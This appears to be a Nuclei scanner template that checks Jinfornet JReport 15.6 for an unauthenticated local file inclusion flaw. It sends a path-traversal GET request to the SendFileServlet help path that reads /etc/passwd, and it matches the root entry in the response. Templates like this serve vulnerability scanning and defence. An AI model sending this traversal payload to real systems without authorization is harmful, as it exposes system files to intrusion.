36 lines
1.2 KiB
YAML
36 lines
1.2 KiB
YAML
id: jinfornet-jreport-lfi
|
|
|
|
info:
|
|
name: Jinfornet Jreport 15.6 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: Jinfornet Jreport 15.6 is vulnerable to local file incluion via the Jreport Help function in the SendFileServlet. Exploitaiton allows remote unauthenticated users to view any files on the Operating System with Application services user permission. This vulnerability affects Windows and Unix operating systems.
|
|
reference:
|
|
- https://cxsecurity.com/issue/WLB-2020030151
|
|
- https://www.jinfonet.com/product/download-jreport/
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
max-request: 1
|
|
tags: jreport,jinfornet,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022077ba210c23a718fc1eb8ee8df462f6de31924533cd021156f8c9812d4dafb427022100af3d0074f79042fc4ddab8f0443bd10d859a029d9ec06074d709cae6d83158bc:922c64590222798bb761d5b6d8e72950
|